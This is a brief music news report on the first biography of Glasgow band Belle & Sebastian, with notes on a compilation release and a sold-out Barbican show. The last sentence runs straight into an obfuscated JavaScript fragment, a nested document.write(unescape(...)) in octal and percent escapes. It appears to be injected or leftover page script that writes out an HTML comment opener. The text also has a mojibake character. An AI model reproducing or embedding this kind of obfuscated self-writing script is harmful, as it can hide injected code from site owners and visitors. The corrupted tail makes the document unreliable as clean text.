The first ever biography of cult indie popsters Belle & Sebastian is to be released next month.
'Just A Modern Rock Story', written by former NME journalist Paul Whitelaw, is available from September 1. It draws on extensive interviews with band members and features rare and exclusive photos.
Belle & Sebastian formed in Glasgow in 1996, and until recently were notorious for their reclusive nature, hardly ever being interviewed and rarely touring.
This year has seen a lot of looking back for the band â€" as well as the book, they released a compilation of their early Jeepster EPs called 'Push Barman To Open Old Wounds' and are to perform their second album,'If You're Feeling Sinister', in its' entirety at London Barbican Centre on September 25 as part of the Don't Look Back season. The show is sold out.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
